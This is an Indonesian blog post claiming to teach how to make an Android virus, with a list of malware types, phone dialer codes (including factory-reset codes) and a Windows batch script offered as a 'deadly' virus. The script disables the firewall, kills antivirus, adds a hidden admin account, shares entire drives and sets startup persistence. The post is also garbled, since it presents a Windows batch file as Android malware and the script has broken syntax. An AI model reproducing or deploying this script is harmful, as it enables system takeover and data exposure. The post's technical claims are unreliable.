Cara Mudah Membuat Virus Android

Cara Mudah Membuat Malware Android -  Malware adalah kependekan dari Malicious Software yang merupakan sebuah program yang dikembangkan untuk menyusup seperti virus dan merusak berbagai sistem yang ada. Komputer atau smartphone yang sobat miliki dapat terinfeksi Malware atau virus melalui email, kegiatan mendownload, atau bisa juga berbagai program yang telah terinfeksi.

membuat malware android

Bahaya Malware adalah program ini mampu mencuri data dan setiap informasi bahkan mampu merusak sistem komputer kalian yang telah terinfeksi. Berbagai jenis malware meliputi virus, worm, rootkit, spyware, adware, trojan horse, serta berbagai jenis software lain yang akan kami bahas lebih mendalam nantinya dan  tentunya juga cara membuat virus Android.

Bukan hanya terbatas pada program saja, malware dapat juga berbentuk kode/script. Jadi Malware meliputi berbagai program dan script yang dicurigai mampu merusak sistem dan berbagai informasi penting yang ada didalamnya.

Sebelum membahas cara membuat virus untuk hp android, ada baiknya mengetahui terlebih dahulu jenis - jenis malware atau virus, berikut penjelasan singkatnya :

Jenis - jenis Malware


  • Virus 

Merupakan salah satu jenis Malware yang mempunyai kemampuan untuk memanipulasi data, menginveksi, mengubah dan merusak sebuah program komputer Anda. Adapun kemampuan lain dari virus ini, yaitu dapat menggandakan diri dengan cara menyelipkan program dari kopian dari asal dirinya menjadi bagian dari program lain di komputer.

  • Worm

Merupakan sebuah program komputer yang memiliki kemampuan untuk menggandakan dirinya melalui kopian dan secara mandirinya virus akan menyebar dengan cepat pada berbagai jaringan komputer melalui port (lubang) keamanan yang terbuka.

  • Trojan hors 

Atau sering disebut dengan Trojan merupakan sebuah program komputer yang mempunyai kemampuan yang tidak bisa di lacak dan seakan-akan baik untuk di gunakan yang ujung-ujungnya merusak sistem. Yang umumnya bertujuan untuk mendapatkan informasi yang di ambil dari korban secara diam-diam (mecuri) yang kemudian membajaknya.

  • Keylogger 

Merupakan sebuah program yang tujuannya untuk mencatat segala aktivitas dari penekanan tombol (inputan) yang muncul dari keyboard. Keylogger sebenarnya bisa menjadi program yang baik dan jahat, tergantung si pemakai dalam menggunakannya.


  • Adware 

Merupakan sebuah software iklan yang di masukkan secara diam-diam oleh pembuat program dengan kemampuan untuk mengunduh dan menampilkan materi iklan secara otomatis tanpa di ketahui penggunanya. Adware ini umumnya berbentuk seperti iklan Pop-Up yang ada di suatu situs.


  • Dialer 

Merupakan sebuah program yang di buat untuk mengarahkan dari sambungan telepon pengguna ke internet, contohnya seperti beberapa nomor premium. Biasanya sebuah komputer yang terkena virus dialer, ia akan memaksa untuk terhubung ke internet walau tidak ada koneksi. Penipuan dialer sering terjadi yang tanpa di sadari oleh penggunanya. Kalau sudah terkena dialer, pastinya korban merasa sangat rugi. Begitu juga sebaliknya, kalau si pembajak sangat untung baginya.


  • Wabbit 

Adalah sebuah program yang memiliki karakteristik seperti worm. Namun tidak memerlukan koneksi jaringan karena hanya bekerja di dalam sistem jaringan lokal. Wabbit akan selalu menduplikatkan dirinya sampai memori di dalam harddisk penuh.


  • BOTS 

Adalah sebuah proses yang bekerja secara otomatis yang kemudian berinteraksi dengan jaringan lain. Bots ini biasanya dapat digunakan untuk tujuan yang baik atau jahat, tergantung pembuatnya. Jika ia digunakan untuk tujuan jahat, ia akan bekerja seperti worm yang dapat menduplikatkan diri dan menginveksi / menyebarkan virus ke komputer. Perbedaannya BOTS itu memerlukan perintah atau arahan dari si pembuat bot itu sendiri supaya dia bereaksi. Contohnya seperti mendapatkan informasi penting, DoS, Spam dan sebagainya.


  • Spyware 

Adalah sebuah program yang bekerja sebagai mata-mata untuk mengetahui kebiasaan yang di kerjakan dari si pengguna komputer dan memberikan informasi tersebut ke pihak lain. Informasi tersebut dapat di pantau secara diam-diam tanpa ketauan si korban. Intinya, tujuan dari spyware ini adalah untuk melakukan pengintaian yang kemudian memberikan informasi tersebut ke pihak pembajak tentang segala aktivitas yang terjadi pada komputer korban.


  • Backdoor 

Adalah salah satu metode yang di pakai untuk melewati suatu proses yang biasanya di lakukan seperti login dan juga berusaha supaya tidak terlacak. Malware jenis ini masuk dengan memanfaatkan celah pintu belakang (Backdoor) dari sebuah perangkat yang sering di selipkan melalui Trojan atau Worm.

Cara mudah membuat virus android

Sebelum membuat virus yang sulit di aplikasikan anda harus mengetahui code-code rahasia yang ada di Android yang akan berhubungan untuk membuat virus android.

  • *#*#4636#*#* : Menampilkan Informasi Phone, Baterai, Penggunaan Baterai, Statistik Penggunaan HP Android.
  • *#*#7780#*#* : Menghapus/Meng-reset Data Pabrik. Menghapus Akun Google yang tersimpan di Android, Sistem dan Data Aplikasi dan Pengaturan dan Aplikasi yang di Download. Tetapi tidak menghapus file SD Card dan Aplikasi yang ada di Android. Ketika menggunakan code ini akan muncul PopUp untuk meyakinkan anda menghapus atau tidak. Jadi bisa di cancel.
  • *2767*3855# : Kode ini digunakan untuk Format Pabrik. Menghapus semuanya dan reinstall firmware HP android. Tidak dapat di Cancel, jadi jangan gunakan Code ini..
  • *#*#34971539#*#* : Menampilkan informasi untuk Camera. Menampilkan menu Update Firmware Camera dalam Gambar, dalam SD, data Firmware Camera, dan update firmware. Jangan pilih opsi pertama karena akan merusak Camera HP android anda.
  • *#*#7594#*#* : Kode ini mengubah tombol End Call/Power di Hp Android anda. Jika ditahan tombol nya akan menampilkan opsi Mode Silent, Airplane Mode dan Power Off.
  • *#*#273283*255*663282*#*#* : Kode ini membuka File copy screen dimana anda dapat backup file media anda.
  • *#*#197328640#*#* : Kode ini digunakan untuk masuk ke mode Service. Untuk mengubah pengaturan Mode Servis seperti WLAN, GPS dan BLuetooth.
  • *#*#232339#*#* atau *#*#526#*#* atau *#*#528#*#* : Mengetes WLAN, gunakan tombol Menu untuk memulai tes.
  • *#*#232338#*#* : Menampilkan alamat MAC WiFi Android anda.
  • *#*#1472365#*#* atau *#*#1575#*#* : Tes GPS
  • *#*#232331#*#* :Tes Bluetooth
  • *#*#232337#*# : Menampilkan alamat Bluetooth Android anda.
  • *#*#8255#*#* : Menampilkan GTalk Service Monitor.
  • *#*#4986*2650468#*#* : PDA, Phone, H/W, RFCallDate
  • *#*#1234#*#* : PDA danPhone
  • *#*#1111#*#* : FTA SW Versi
  • *#*#2222#*#* : FTA HW Versi
  • *#*#44336#*#* : PDA, Phone, CSC, Build Time, Changelist number

Kode untuk melakukan tes Pabrik Android

  • *#*#0283#*#* Packet Loopback
  • *#*#0*#*#* tes LCD
  • *#*#0673#*#* OR *#*#0289#*#* tes Melodi Suara
  • *#*#0842#*#* Vibration dan Backlight tes
  • *#*#2663#*#* Touch screen version
  • *#*#2664#*#* Touch screen test
  • *#*#0588#*#* Proximity sensor test
  • *#*#3264#*#* RAM version

Setelah Kalian mengenal beberapa code rahasia yang ada di Android dan Iphone kalian dapat membuat virus yang kalian inginkan.

cara untuk membuat virus atau malware android, dan berikut langkah - langkahnya :
  • Pertama sobat buka notepad atau memo untuk membuat sebuah file atau dokumen baru.
  • Kedua masukkan script nya,  seperti di gambar di bawah ini

Membuat Virus Android

 @system
echo>>restart
echo>>del :C
echo>>del:E
echo>>error
cls
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$
echo ——————————————————-
echo =============
echo =============
echo =============
echo ——————————————————-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$
@echo off
color 0a
cls
IF not exist %windir%\%0 copy %0 %windir%
netsh firewall set opmode=disable
net stop ShareAccess
Net stop “Security Center”
Tskill *AV*
NET USER admin admin123 /ADD
NET LOCAL GROUP ADMINISTRATORS admin /ADD
Reg ADD “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts \UserList” /v”admin” /t REG_DWORD/d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\Messenger /v Start /t REG_DWORD /d 2/f
Net start messenger
dir *.*>>Filelist.txt
Net send 192.168.1.100 >hasil.txt
NET SHARE system=%SYSTEMDRIVE% /UNLIMITED
NET SHARE data1=D:\ /UNLIMITED
NET SHARE data1=E:\ /UNLIMITED
REG ADD HKCR\Network\SharingHandler /ve /t REG_SZ/d “”/f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v forceguest /t REG_DWORD /d 0 /f
REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v restrictanonymous /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\ControlSet001\Services\TIntSvr /v Start /t REG_DWORD /d 2/f
Net start tIntsvr
REG ADD HKLM\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f
REG ADD HKCU\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f

  • Ketiga simpan file tersebut dalam format .bat
  • Keempat untuk mengaplikasikannya anda harus paham sedikt cara ******** sulit sekali untuk mengaplikasikannya jika awam

Baca juga : Cara Mengubah Google Versi Mobile ke Google Versi Destop di Smartphone

Diatas adalah script virus android mematikan,  gunakanlah dengan bijak dan bertanggung jawab.
Mungkin itu saja Cara Mudah Membuat Virus Android, Terimakasih telah berkunjung di bintang inspirasi, website penuh inspirasi, share dan koment jika bermanfaat

5 Komentar untuk "Cara Mudah Membuat Virus Android"

  1. Tujuan virus seperti contoh di atas buat apa yg kak

    BalasHapus
  2. Ini klo udah di save hp kita kena virus apa

    BalasHapus
  3. Min, mohon bantuannya. Kalau misal android kena virus ini kenapa ya? Lalu caranya buat ngenakan ke handphone lain gimana?

    BalasHapus
  4. Aman gak sih, takut hp kita yang kena virus takut 😨

    BalasHapus

Jangan Lupa tinggalkan komentar anda jika postingan ini bermanfaat :)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel